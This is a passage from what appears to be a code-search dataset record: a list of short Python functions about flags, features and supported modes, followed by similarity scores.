None:\n return (Feature.CHORES, Feature.PROJECTS)", "def enumerate_flags(flag, f_map):\r\n # Reset string based flags to null\r\n f_type = ''\r\n f_flag = ''\r\n # Iterate through flags\r\n for i in f_map:\r\n if i & flag:\r\n if f_map[i] == 'FolderEvent;' or \\\r\n f_map[i] == 'FileEvent;' or \\\r\n f_map[i] == 'SymbolicLink;' or \\\r\n f_map[i] == 'HardLink;':\r\n f_type = ''.join([f_type, f_map[i]])\r\n else:\r\n f_flag = ''.join([f_flag, f_map[i]])\r\n return f_type, f_flag", "def get_scoped_to_feature() -> Iterable[Feature] | Feature | None:\n return (Feature.SLACK_TASKS, Feature.PROJECTS)", "def get_parsed_flags():\n return Flags.parsed_args", "def get_user_iflags(self, *args):\n return _ida_hexrays.cfunc_t_get_user_iflags(self, *args)", "def available_functions(self):\n return self.config.keys()", "def available_functions(self):\n return self.target.read_value(self.available_functions_file).splitlines()", "def supported_modes(self):\n return [OFF, SYNC, CHARGE]", "def get_supported_feature_sets(flags) -> List[str]:\n\n # find all supported feature sets\n supported = []\n for one_feature_set in sorted(REQUIRED_FEATURES.keys()):\n if supports_feature_set(flags, one_feature_set):\n supported.append(one_feature_set)\n return supported", "def get_xst_flags(config):\n #print \"Apply slave tags\"\n flags = {}\n user_flags = {}\n if \"xst\" in config.keys():\n if \"flags\" in config[\"xst\"].keys():\n user_flags = config[\"xst\"][\"flags\"]\n\n fn = os.path.join(os.path.dirname(__file__), XST_DEFAULT_FLAG_FILE)\n default_flags = json.load(open(fn, \"r\"))\n for key in default_flags:\n flags[key] = default_flags[key]\n if key in user_flags.keys():\n flags[key][\"value\"] = user_flags[key]\n\n return flags", "def flags(self, query):\n flag_list = []\n\n # add the help flag if it is requested\n if '--help' in query:\n flag_list.append('help')\n query = query.replace('--help', '').replace('-h', '')\n\n return query, flag_list", "def get_flags(args):\r\n\r\n flags = 0\r\n\r\n if args.regexfilepattern is not None:\r\n flags |= pygrep.FILE_REGEX_MATCH\r\n\r\n if not args.regexp:\r\n flags |= pygrep.LITERAL\r\n elif args.dotall:\r\n flags |= pygrep.DOTALL\r\n\r\n if args.ignore_case:\r\n flags |= pygrep.IGNORECASE\r\n\r\n if args.recursive:\r\n flags |= pygrep.RECURSIVE\r\n\r\n if args.regexdirpattern:\r\n flags |= pygrep.DIR_REGEX_MATCH\r\n\r\n return flags", "def __int__(self):\n flags = 
self._analog_input_mode\n flags = set_bit(flags, 2, self._send_on_sensor_alarm)\n flags = set_bit(flags, 3, self._send_on_input_port_change)\n flags = set_bit(flags, 4, self._enable_1_wire_port)\n flags = set_bit(flags, 5, self._enable_all_link_aliasing)\n flags = set_bit(flags, 6, self._send_on_output_port_change)\n flags = set_bit(flags, 7, self._enable_output_timers)\n return flags", "def features(self):\r\n dict_data = []\r\n my_dict = {\r\n \":IODisc\":\"\",\r\n \"Group\": \"$System\",\r\n \"Comment\": \"\",\r\n \"Logged\": \"No\",\r\n \"EventLogged\": \"No\",\r\n \"EventLoggingPriority\": 0,\r\n \"RetentiveValue\": \"No\",\r\n \"InitialDisc\": \"Off\",\r\n \"OffMsg\": \"\",\r\n \"OnMsg\": \"\",\r\n \"AlarmState\": \"None\",\r\n \"AlarmPri\": 1,\r\n \"DConversion\": \"Direct\",\r\n \"AccessName\": \"HC\",\r\n \"ItemUseTagname\": \"No\",\r\n \"ItemName\": \"\",\r\n \"ReadOnly\": \"No\",\r\n \"AlarmComment\": \"\",\r\n \"AlarmAckModel\": 0,\r\n \"DSCAlarmDisable\": 0,\r\n \"DSCAlarmInhibitor\": \"\",\r\n \"SymbolicName\": \"\"\r\n }\r\n\r\n dict_data.append(my_dict)\r\n\r\n return(my_dict)", "def fact():\n\n result = \"None\"\n\n objc.loadBundle(\n \"IOBluetooth\",\n globals(),\n bundle_path=objc.pathForFramework(\n u\"/System/Library/Frameworks/IOBluetooth.framework\"\n ),\n )\n btprefs = IOBluetoothPreferences.alloc().init()\n result = bool(btprefs.fileTransferServicesEnabled())\n\n return {factoid: result}", "def nodes_flags(self):\n return self._nodes_flags", "def health_checks(self):\n return [self.check_device_connected, self.check_clear_flags]", "def test_flags(self):\n self.check_search(\n dict(flag_contact=u'yes'),\n [u'Tackle', u'DoubleSlap', u'Ice Punch', u'Bite', u'Fly'],\n 'flimsy search by flag',\n )\n\n self.check_search(\n dict(flag_mirror=u'no'),\n [u'Counter', u'Curse', u'Focus Punch', u'Sunny Day'],\n 'better search by flag',\n )\n\n self.check_search(\n dict(flag_contact=u'no', name=u'punch'),\n [],\n 'searching by nega-flag',\n exact=True,\n )", "def SocketFlags(self) -> SocketFlags:", "def print_flags():\n for key, value in vars(FLAGS).items():\n print(key + ' : ' + str(value))", "def print_flags():\n for key, value in vars(FLAGS).items():\n print(key + ' : ' + str(value))", "def print_flags():\n for key, value in vars(FLAGS).items():\n print(key + ' : ' + str(value))", "def print_flags():\n for key, value in vars(FLAGS).items():\n print(key + ' : ' + str(value))", "def gen_flags(self, field):\n if random.random() < 0.5:\n return random.choice(['S', 'A', 'SA', 'PA', 'FA', 'R', 'P', 'F', 'RA', ''])\n else:\n sample = fuzz(self.protocol())\n # Since scapy lazily evaluates fuzzing, we first must set a\n # legitimate value for scapy to evaluate what combination of flags it is\n sample.flags = sample.flags\n return str(sample.flags)", "def getTools(self):\n return [self.toggleEditMode]", "def getFeatures(self, state, action):\n util.raiseNotDefined()", "def getFeatures(self, state, action):\n util.raiseNotDefined()", "def getFeatures(self, state, action):\n util.raiseNotDefined()" ]
[ "0.68110704", "0.66530377", "0.6499626", "0.6473792", "0.64643645", "0.6449167", "0.6381851", "0.6338008", "0.6265147", "0.6250086", "0.6250086", "0.6250086", "0.6250086", "0.62319344", "0.62319344", "0.62319344", "0.62319344", "0.6223301", "0.61941856", "0.61895657", "0.61459684", "0.6107575", "0.6084206", "0.60506064", "0.6038999", "0.60311514", "0.6014956", "0.5896932", "0.5887557", "0.5882827", "0.58682525", "0.58367985", "0.5804343", "0.5783443", "0.5757118", "0.5756025", "0.57498395", "0.57418215", "0.57410496", "0.572027", "0.57183933", "0.56963134", "0.56797564", "0.56760174", "0.564404", "0.56373036", "0.56337583", "0.558968", "0.5538051", "0.5538051", "0.5538051", "0.5538051", "0.55362415", "0.5517928", "0.5490102", "0.54500526", "0.54050136", "0.5394683", "0.53757256", "0.53692514", "0.536082", "0.53526413", "0.5334797", "0.5316201", "0.5304371", "0.5288723", "0.52751464", "0.52383083", "0.52284807", "0.5216154", "0.52158254", "0.52143055", "0.5201437", "0.5197968", "0.517697", "0.5172334", "0.5167235", "0.5164312", "0.51631415", "0.5157121", "0.51359135", "0.51348805", "0.51313114", "0.51212645", "0.51177967", "0.5116337", "0.51113534", "0.5103396", "0.51011914", "0.51002294", "0.5100104", "0.5100085", "0.5100085", "0.5100085", "0.5100085", "0.5100063", "0.509191", "0.5091494", "0.5091494", "0.5091494" ]
0.6317779
8
Returns the LibXCFunctional references.
def get_references(self): return self._refs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def function_refs(self) -> List[FunctionReference]:\n return self._function_refs", "def getXRefsTo(self):\r\n # type: () -> (list[int], list[int])\r\n crefs = []\r\n drefs = []\r\n # If the current address is function process it\r\n if idc.get_func_flags(self.func_ea) != -1:\r\n # Find all code references to func\r\n ref = idc.get_first_cref_to(self.func_ea)\r\n while ref != idaapi.BADADDR:\r\n # name = get_func_name(ref)\r\n # if not name: name = \"ROM:%08X\" % ref\r\n crefs.append(ref)\r\n ref = idaapi.get_next_cref_to(self.func_ea, ref)\r\n # Find all data references to func\r\n for ref in idautils.DataRefsTo(self.func_ea):\r\n drefs.append(ref)\r\n for ref in idautils.DataRefsTo(self.func_ea + 1):\r\n drefs.append(ref)\r\n\r\n return crefs, drefs", "def list_refs(self):\n pass", "def get_references(caller, callee):\n function_manager = currentProgram.getFunctionManager()\n\n ref_list = []\n callee_symbol = callee.getSymbol()\n callee_references = callee_symbol.getReferences()\n\n for ref in callee_references:\n addr = ref.getFromAddress()\n func = function_manager.getFunctionContaining(addr)\n if func == caller:\n ref_list.append(addr)\n\n return ref_list", "def references(self) -> \"IterableList[Reference]\":\n return Reference.list_items(self)", "def get_refs(func):\n found = re.findall(\"References:(.*)\", func.__doc__, flags=re.DOTALL)\n if any(found):\n ref = \" \".join([s.strip() for s in found[0].split(\"\\n\")]).strip()\n return ref\n else:\n return \"\"", "def getFileReferences():\n refNodes = pm.ls(rf=True)\n fileRefs = [r.referenceFile() for r in refNodes]\n return fileRefs", "def refs(self):\n return self._refs", "def _refs(self, items):\n # type: (Iterable[Any]) -> Iterable[weakref.ReferenceType]\n return map(self.ref, items)", "def functions(self):\n return self.__functions", "def get_all_refobjs(self, ):\n return cmds.ls(type=\"jb_reftrack\")", "def GetExternRefs(*args):\n return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)", "def XCAFDoc_ShapeTool_GetExternRefs(*args):\n return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)", "def get_fns(self):\n return self.key_to_fn", "def list_defect_refs(self):\n print('-----------\\nDEFECT_REFs\\n-----------')\n self._print_dict(self.defect_refs)", "def get_short_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\txrf2 = get_first_fcref_to( ea )\r\n\tif xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def getXRefsFrom(self):\r\n # type: () -> (list[int], list[int])\r\n crefs = []\r\n drefs = []\r\n\r\n\r\n # normalFlow = True\r\n # for ref in idautils.CodeRefsFrom(self.func_ea, normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea, not normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea-1, normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea-1, not normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n\r\n # needed to identify pool variables. drefs accessing the pool may access pointers\r\n # in the pool. 
the pointers should be retrieved instead\r\n size_pool = self.getSize(withPool=True)\r\n # for each instruction\r\n for i in idautils.FuncItems(self.func_ea):\r\n for xref in idautils.XrefsFrom(i, 0):\r\n # if the xref is to a far or near called function\r\n if xref.type == idc.fl_CN or xref.type == idc.fl_CF:\r\n if xref.to not in crefs:\r\n crefs.append(xref.to)\r\n # if the xref is to a read or write data access\r\n if xref.type == idc.dr_W or xref.type == idc.dr_R:\r\n if xref.to not in drefs:\r\n # if xref.to is in the pool, then retrieve content if it's a pointer\r\n if xref.to < self.func_ea + size_pool:\r\n # those are the references found at the pool location\r\n iteratedOnce = False\r\n for poolRef in idautils.XrefsFrom(xref.to, 0):\r\n if iteratedOnce:\r\n raise(FunctionException(\"%08X: there should only be one data xref in pool variable\"\r\n % (self.func_ea)))\r\n # there should only be one in the pool refernce\r\n if poolRef.to not in drefs:\r\n drefs.append(poolRef.to)\r\n iteratedOnce = True\r\n else:\r\n drefs.append(xref.to)\r\n\r\n # for ref in idautils.DataRefsFrom(self.func_ea):\r\n # drefs.append(ref)\r\n # for ref in idautils.DataRefsFrom(self.func_ea - 1):\r\n # drefs.append(ref)\r\n return crefs, drefs", "def get_short_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_from( ea )\r\n\txrf2 = get_first_fcref_from( ea )\r\n\tif xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_from( ea, xrf )\r\n\twhile xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_from( ea, xrf )\r\n\treturn ret", "def list_all_refs(self):\n self.list_refs()\n self.list_ref0s()\n self.list_defect_refs()", "def references(self):\n return tuple(self.__references)", "def fetchReferences(self, dataRef, exposure):\n skyMap = dataRef.get(self.dataPrefix + \"skyMap\", immediate=True)\n tractInfo = skyMap[dataRef.dataId[\"tract\"]]\n patch = tuple(int(v) for v in dataRef.dataId[\"patch\"].split(\",\"))\n patchInfo = tractInfo.getPatchInfo(patch)\n references = lsst.afw.table.SourceCatalog(self.references.schema)\n references.extend(self.references.fetchInPatches(dataRef, patchList=[patchInfo]))\n return references", "def _fc_function_definitions(self) -> str:\n result = 'extern \"C\" {\\n\\n'\n for namespace in self.namespaces:\n for member in namespace.members:\n result += member.fortran_c_wrapper()\n\n result += '}\\n\\n'\n return result", "def test_v1_alert_ref_list_get(self):\n pass", "def list_refs(self):\n print('----\\nREFs\\n----')\n self._print_dict(self.refs)", "def get_references(self):\n return self._references", "def functionals(self):\n return self.__functionals", "def get_refs(*args, **kwargs):\n return get_refs_async(*args, **kwargs).get_result()", "def list_defect_ref_keys(self):\n print('=======')\n print('DEFECT_REFs')\n print('=======')\n for key in self.defect_refs:\n print(key)", "def getRefs(self):\n\n backend = self.backend\n refs = self.moduleRefs\n for ref in refs:\n refPure = ref.rsplit(\":\", 1)[0]\n if refPure in self.seen:\n continue\n\n parts = splitModRef(ref)\n if not parts:\n self.good = False\n continue\n\n parts[2] = prefixSlash(normpath(parts[2])) # the relative bit\n theBackend = (\n None if parts[-1] is None or parts[-1] == backend else parts[-1]\n )\n\n if not self.getModule(*parts[0:-1], backend=theBackend):\n self.good = False", "def __get_references(self):\n named_references = []\n for usage in self.xml_cache.get_xml_tree(\"usagemodel\"):\n variable_usages = 
usage.findall(\".//namedReference__VariableUsage\")\n for name in variable_usages:\n named_references.append(name.get(\"referenceName\"))\n return named_references", "def get_functions(self):\n\n functions = []\n for scenario in self.scenarios:\n functions.extend(scenario.functions)\n\n return functions", "def find_references(self):\n cls = self.__class__\n nodes = []\n for sobj in self._std.FindDependances(self.get_sobj()):\n nodes.append(cls(self._std, self._bld, sobj.GetID()))\n return nodes", "def get_explorer_toolbox() -> List[Tuple[str, str, str]]:\n explorer_toolbox = list(_explorer_toolbox)\n explorer_toolbox.extend(\n (func_name, title, description)\n for func_name, title, description in _bio2bel_functions\n if _function_is_registered(func_name)\n )\n return explorer_toolbox", "def _get_functions():\n\n # Get all functions that start with _office.\n fcts = {fct_name[len(FCT_PREFIX):]: fct for (fct_name, fct) in\n globals().iteritems() if fct_name.startswith(FCT_PREFIX) and\n hasattr(fct, \"__call__\")}\n\n return fcts", "def get_crossrefs(self):\n return self._crossrefs", "def get_crossrefs(self):\n inter = self.get_interaction()\n crossrefs = {inter: inter.get_crossrefs()}\n crossrefs.update(self._economics.get_crossrefs())\n return crossrefs", "def _deploy_function_refs(self):\n for function_ref in self._spec.function_refs.values():\n logger.info(f\"deploy child function {function_ref.name} ...\")\n function_object = function_ref.function_object\n function_object.metadata.name = function_ref.fullname(self)\n function_object.metadata.project = self.metadata.project\n function_object.metadata.tag = self.metadata.tag\n function_object.spec.graph = self.spec.graph\n # todo: may want to copy parent volumes to child functions\n function_object.apply(mlrun.v3io_cred())\n function_ref.db_uri = function_object._function_uri()\n function_object.verbose = self.verbose\n function_object.spec.secret_sources = self.spec.secret_sources\n function_object.deploy()", "def get_functions():\n\treturn [f for f in globals() if f.startswith('make_')]", "def get_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_from( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_from( ea, xrf )\r\n\treturn ret", "def get_far_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_fcref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_fcref_from( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_fcref_from( ea, xrf )\r\n\treturn ret", "def available_functions(self):\n return self.target.read_value(self.available_functions_file).splitlines()", "def get_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def references(self):\n ref_nodes = self.root.xpath(\".//bib-reference\")\n return list(\n itertools.chain.from_iterable(\n self.get_reference_iter(node) for node in ref_nodes\n )\n )", "def links(self):\n inp, out = self.signature\n if self.is_function():\n using = self.function.function\n if not all(inp) or not out:\n return []\n link = core.component_link.ComponentLink(inp, out, using)\n return [link]\n if self.is_helper():\n helper = self.function.helper\n if not all(inp):\n return []\n return helper(*inp)", "def 
keyrefs(self):\n return [ref(key) for key in self.iterkeys()]", "def support_opset(self) -> Collection[OpsetVersion]:\n return list(self._functions)", "def get_refs(genome_build, aligner, config):\n find_fn = _find_file(config[CONFIG_KEY], startswith=True)\n ref_prefix = sret.find_ref_prefix(genome_build, find_fn)\n return sret.standard_genome_refs(genome_build, aligner, ref_prefix, _list(config[CONFIG_KEY]))", "def match_function(self, tokens):\n items = []\n\n def add_ref(item, unused_start, unused_end, unused_value):\n if isinstance(item, logic.Description):\n items.append(logic.expr(item))\n else:\n items.append(item)\n\n self.cp_parser.reference_callback = add_ref\n self.cp_parser.parse_tokens(tokens, debug=self.debug)\n return items", "def dependencies(self, dep_context):\n if self.strict_deps:\n return self.target.strict_dependencies(dep_context)\n else:\n return list(self.target.closure(bfs=True, **dep_context.target_closure_kwargs))", "def ExtractOperations(toolF):\n return [o[\"uri\"] for o in toolF[\"operation\"]]", "def getReferencesTo(self, address: ghidra.program.model.address.Address) -> List[ghidra.program.model.symbol.Reference]:\n ...", "def references_list( self, theWeaver ):\n return [ (c.name, c.seq) \n for c in theWeaver.reference_style.chunkReferencedBy( self ) ]", "def fcvs(self): \n return self._link_reg.fcvs", "def functional(self):\n return self.__functional", "def getReferenceAnalyses(self):\n return [analysis for analysis in self.getAnalyses() \\\n if analysis.portal_type=='ReferenceAnalysis']", "def get_fsleyes_deps():\n\n # The dependency list is stored in requirements.txt\n with open(op.join(basedir, 'requirements.txt'), 'rt') as f:\n install_requires = f.readlines()\n\n return [i.strip() for i in install_requires]", "def refmodes(self):\n return self._refmodes", "def list_ref_keys(self):\n print('=======')\n print('REFs')\n print('=======')\n for key in self.refs:\n print(key)", "def functions(self):\n return functions(self.startEA, self.endEA)", "def _get_all_called_funcs(item, context):\n\n # Get all the functions called in the VBA object.\n call_visitor = function_call_visitor()\n item.accept(call_visitor)\n func_names = call_visitor.called_funcs\n\n # Get all of the 0 argument functions called in the VBA object.\n tmp_context = Context(context=context, _locals=context.locals, copy_globals=True)\n _, zero_arg_funcs = _get_var_vals(item, tmp_context)\n func_names.update(zero_arg_funcs)\n \n # Get the definitions for all local functions called.\n local_funcs = []\n for func_name in func_names:\n if (context.contains(func_name)):\n curr_func = context.get(func_name)\n if (isinstance(curr_func, VBA_Object)):\n local_funcs.append(curr_func)\n\n # Done. 
Return the definitions of all the local functions\n # that were called.\n return local_funcs", "def get_noncall_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\tif xrf != BADADDR:\r\n\t\tif ua_mnem( xrf ) != \"call\":\r\n\t\t\tret.append( xrf )\r\n\telse:\r\n\t\tif ea not in get_far_crefs_from( xrf ):\r\n\t\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tif ua_mnem( xrf ) != \"call\":\r\n\t\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def _get_factories(self):\n return self._factories", "def get_refs(self): \n for row in self._get_references_node():\n yield row.fetch_all_fields()", "def get_allref(self):\n return self.__applicationList.keys()", "def functions(self):\n return [v for v in self.globals.values()\n if isinstance(v, values.Function)]", "def callables(self):\n \n if hasattr(self, \"_callables\"):\n return self._callables\n \n # build a list of all the Callable objects\n # The old backend processed all operations first\n # (FIXME: duplicate for the sake of easy checking)\n self._callables = []\n\n for c in self._node.callables():\n if isinstance(c, idlast.Operation):\n self._callables.append(call.operation(self, c))\n \n for c in self._node.callables():\n if isinstance(c, idlast.Attribute):\n self._callables = self._callables + call.read_attributes(self, c)\n if c.readonly(): continue\n self._callables = self._callables + call.write_attributes(self, c)\n \n return self._callables", "def references(self):\n return self._get_related_resources(False)", "def References(self, default=[{}]):\n tmp = self.data.get('metadata', {}).get('references', default)\n return [HEP.ReferenceObject(i) for i in tmp]", "def get_flat_input_refs(self):\n ret = []\n for role_key, role_obj in self.get_recipe_inputs().items():\n for item in role_obj[\"items\"]:\n ret.append(item[\"ref\"])\n return ret", "def external_array_references(self):\n return self._to_ears(self.fileuris)", "def lookup_ops(self):\n return self._lookup_ops", "def get_feature_defs(python_module):\n defs = []\n for fn_name, fn in inspect.getmembers(python_module, inspect.isfunction):\n if hasattr(fn, \"_feature__livefeature__feature_def\"):\n defs.append(fn._feature__livefeature__feature_def)\n\n return defs", "def references(self):\n return self.header('References', '').split()", "def get_dependencies(self, recursive=False):\n dependencies = set()\n for reference in self.references:\n if isinstance(reference.ref_cell, Cell):\n if recursive:\n dependencies.update(reference.ref_cell.get_dependencies(True))\n dependencies.add(reference.ref_cell)\n return dependencies", "def funnels(self):\r\n return resources.Funnels(self)", "def getListOfReferenceGlyphs(self, *args):\n return _libsbml.GeneralGlyph_getListOfReferenceGlyphs(self, *args)", "def autofixDependencies(self, global_ctx):\n pass", "def fortran_functions(self) -> str:\n result = ''\n for member in self.members:\n result += member.fortran_function()\n return result", "def fetch_refspecs(self):\n\n specs = ffi.new('git_strarray *')\n err = C.git_remote_get_fetch_refspecs(specs, self._remote)\n check_error(err)\n\n return strarray_to_strings(specs)", "def reference_types(self):\n return self.references.keys()", "def reference_types(self):\n return self.references.keys()", "def refs_ii(self):\n return self._refs_ii", "def test_reflectance_ref(fluxd, wfb, f_sun, ref):\n\n xsec = 6.648e5 * u.km**2\n\n with vega_fluxd.set({'V': u.Quantity(3.589e-9, 'erg/(s cm2 AA)')}):\n with 
solar_fluxd.set({wfb: f_sun}):\n r = fluxd.to('1/sr', reflectance(wfb, cross_section=xsec))\n assert r.unit == u.sr**-1\n assert np.isclose(r.value, ref)", "def get_allref(self):\n return self.__filetypeList.keys()", "def get_scoped_to_feature() -> Iterable[Feature] | Feature | None:\n return (Feature.SLACK_TASKS, Feature.PROJECTS)", "def fortran_functions(self) -> str:\n result = ''\n if self.public is None:\n return result\n\n result += \"\".join(member.fortran_functions() for member in self.members)\n return result", "def get(self, *args):\n return _libsbml.ListOfFunctionDefinitions_get(self, *args)", "def get_flat_output_refs(self):\n ret = []\n for role_key, role_obj in self.get_recipe_outputs().items():\n for item in role_obj[\"items\"]:\n ret.append(item[\"ref\"])\n return ret", "def RawRefs(self, default=[{}]):\n tmp = self.data.get('raw_refs', default)\n return [HEP.RawReferenceObject(i) for i in tmp]", "def get_scoped_to_feature() -> Iterable[Feature] | Feature | None:\n return (Feature.CHORES, Feature.PROJECTS)", "def CodeRefsFrom(ea, flow):\n xref = ida_xref.xrefblk_t()\n if flow == 1:\n yield from xref.crefs_from(ea)\n else:\n yield from xref.fcrefs_from(ea)", "def check_references(swagger: Dict):\n events = set()\n\n ref_jspath = JSPATH_REFERENCES\n\n for _, reference, path in get_elements(swagger, ref_jspath):\n # handle only local references\n if reference.startswith(\"#/\"):\n # decompose reference (error if not possible)\n try:\n rt, obj = reference[2:].split(\"/\")\n except ValueError:\n events.add(\n ReferenceInvalidSyntax(\n path=path, reason=f\"reference {reference} not of the form '#/section/item'\"\n )\n )\n continue\n\n if rt not in REFERENCE_SECTIONS:\n events.add(\n ReferenceInvalidSection(\n path=path,\n reason=f\"Reference {reference} not referring to one of the sections {REFERENCE_SECTIONS}\",\n )\n )\n\n # resolve reference (error if not possible)\n try:\n swagger[rt][obj]\n except KeyError:\n events.add(\n ReferenceNotFoundValidationError(\n path=path, reason=f\"reference '#/{rt}/{obj}' does not exist\"\n )\n )\n\n return events", "def get(self, *args):\n return _libsbml.ListOfSpeciesReferences_get(self, *args)", "def test_getFunctions(self):\n cases = [\n (self.test_eac + \"NE01100.xml\", 4),\n (self.test_eac + \"NE01101.xml\", 8),\n (self.test_eac + \"NE01501.xml\", 0),\n (self.test_eac + \"NE00001.xml\", 0),\n ]\n for case in cases:\n source, expected = case\n doc = EacCpf.EacCpf(source, 'http://www.example.com')\n self.assertNotEqual(doc, None)\n result = doc.getFunctions()\n self.assertNotEqual(result, None)\n self.assertEqual(len(result), expected)", "def founders(self) -> object:\n return self._founders", "def list_reference_images_in_filter(conn,primary_ref,f,log):\n\n log.info('Identifying all current reference image in filter '+str(f))\n\n query = 'SELECT * FROM reference_images WHERE filter=\"'+str(primary_ref[f])+\\\n '\" AND software=\"'+str(primary_ref['software_id'])+\\\n '\" AND facility!=\"'+str(primary_ref['facility_id'])+'\"'\n\n ref_image_list = phot_db.query_to_astropy_table(conn, query, args=())\n\n log.info(repr(ref_image_list))\n\n return ref_image_list", "def get_pyweakrefs(obj: typing.Any) -> list[ReferenceType]:\r\n seq = _reference_id_registry.get(id(obj), [])\r\n return [seq[0] for item in seq]", "def fcv_name_list(self):\n return list(self._link_reg.fcv_names)", "def checkRefs(self, export_refs):\r\n return True", "def get_connector_references(context):\n\n catalog = plone.api.portal.get_tool('portal_catalog')\n query = 
dict(portal_type='xmldirector.connector')\n items = list()\n for brain in catalog(**query):\n items.append(SimpleTerm(brain.UID, brain.UID, brain.Title))\n items.sort(key=operator.attrgetter(\"title\"))\n return SimpleVocabulary(items)" ]
[ "0.69382197", "0.6387038", "0.6072197", "0.58689415", "0.5774684", "0.57471573", "0.57462764", "0.57416767", "0.5685982", "0.561145", "0.5598167", "0.5594494", "0.55660653", "0.5555497", "0.55140364", "0.55033904", "0.5478641", "0.54763013", "0.5456211", "0.5435863", "0.5416174", "0.5399169", "0.5391509", "0.53781044", "0.53631365", "0.5354028", "0.53507113", "0.53483707", "0.53349346", "0.5334263", "0.5329226", "0.5324943", "0.5303841", "0.52972317", "0.5295265", "0.52922213", "0.52804947", "0.5276527", "0.5251373", "0.52377105", "0.5226639", "0.5220364", "0.5204701", "0.5201124", "0.5181474", "0.5144318", "0.5143494", "0.51279694", "0.51206005", "0.5111458", "0.5108664", "0.5095298", "0.508208", "0.5071141", "0.5070624", "0.5040673", "0.5024185", "0.50236475", "0.50227207", "0.5019682", "0.5006994", "0.5001596", "0.49869597", "0.49758926", "0.49754298", "0.49673468", "0.49650425", "0.49573877", "0.49521962", "0.49512273", "0.4947636", "0.4945971", "0.49459067", "0.49345306", "0.49241155", "0.4914016", "0.49050444", "0.49017143", "0.48838395", "0.48782012", "0.48782012", "0.48768446", "0.48741227", "0.48667023", "0.4832811", "0.48299792", "0.4822731", "0.48227125", "0.48056847", "0.48040435", "0.47876963", "0.4780698", "0.47616705", "0.4756012", "0.47546604", "0.4753492", "0.4749146", "0.47470367", "0.47405127", "0.47374755" ]
0.56396455
9
Returns the LibXCFunctional bibtex references.
def get_bibtex(self): return self._bibtexs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def references(self):\n ref_nodes = self.root.xpath(\".//bib-reference\")\n return list(\n itertools.chain.from_iterable(\n self.get_reference_iter(node) for node in ref_nodes\n )\n )", "def get_refs(func):\n found = re.findall(\"References:(.*)\", func.__doc__, flags=re.DOTALL)\n if any(found):\n ref = \" \".join([s.strip() for s in found[0].split(\"\\n\")]).strip()\n return ref\n else:\n return \"\"", "def get_refs(genome_build, aligner, config):\n find_fn = _find_file(config[CONFIG_KEY], startswith=True)\n ref_prefix = sret.find_ref_prefix(genome_build, find_fn)\n return sret.standard_genome_refs(genome_build, aligner, ref_prefix, _list(config[CONFIG_KEY]))", "def GetExternRefs(*args):\n return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)", "def references_list( self, theWeaver ):\n return [ (c.name, c.seq) \n for c in theWeaver.reference_style.chunkReferencedBy( self ) ]", "def extract_references(text, preprocessor, model):\n has_reference_section, reference_section, non_reference_section = preprocess_reference_text(text)\n reference_text = reference_section if has_reference_section else non_reference_section\n fragment = preprocessor(reference_text)\n out = model(fragment.idx).argmax(dim=2).cpu().numpy()\n\n buffer = ''\n found_citations = []\n in_citation = False\n for char, pred in zip(fragment.text, out[0, :]):\n if pred == 2:\n in_citation = True\n if pred == 3:\n in_citation = False\n if pred in [2, 3]:\n if buffer:\n found_citations.append(buffer)\n buffer = char\n elif pred == 1:\n buffer += char\n elif pred == 0:\n if in_citation:\n buffer += char\n else:\n if buffer:\n found_citations.append(buffer)\n buffer = ''\n return found_citations", "def XCAFDoc_ShapeTool_GetExternRefs(*args):\n return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)", "def references(self):\n return self.header('References', '').split()", "def list_refs(self):\n pass", "def get_references(self):\n\n return self._refs", "def find_references(doi):\n if doi is None:\n return None\n\n references = []\n if doi:\n response = requests.get(f\"https://opencitations.net/index/api/v1/references/{doi}\").json()\n if response:\n references = [{\"doi\": r['cited'].replace(\"coci =>\", \"\")} for r in response]\n\n if references:\n return references\n else:\n return None", "def references(self) -> \"IterableList[Reference]\":\n return Reference.list_items(self)", "def References(self, default=[{}]):\n tmp = self.data.get('metadata', {}).get('references', default)\n return [HEP.ReferenceObject(i) for i in tmp]", "def getFileReferences():\n refNodes = pm.ls(rf=True)\n fileRefs = [r.referenceFile() for r in 